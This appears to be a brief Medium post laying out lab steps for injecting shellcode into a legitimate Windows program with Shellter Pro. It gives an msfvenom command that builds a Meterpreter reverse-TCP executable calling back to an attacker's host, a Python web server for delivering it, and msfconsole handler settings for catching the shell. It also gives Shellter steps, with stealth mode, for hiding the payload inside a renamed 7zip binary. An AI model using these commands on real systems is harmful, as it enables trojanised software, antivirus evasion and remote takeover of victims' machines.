Using Shellter Pro for dynamic shellcode injection

Lab setup

//msfvenom to generate exe
~/msfvenom -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f exe > example.exe
//HTTP server setup
~/python -m SimpleHTTPServer 80
//msfconsole for our session
~/msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost x.x.x.x
set lport 443
//Shellter Pro using default configuration
1. Put Shellter in Automatic mode
2. Check online for updates
3. Select PE - 7zip renamed to 1.exe for ease
4. Turn on stealth mode
5 - end Use basic features that ships with the tool
//msfconsole for our session
~/msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost x.x.x.x
set lport 443

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store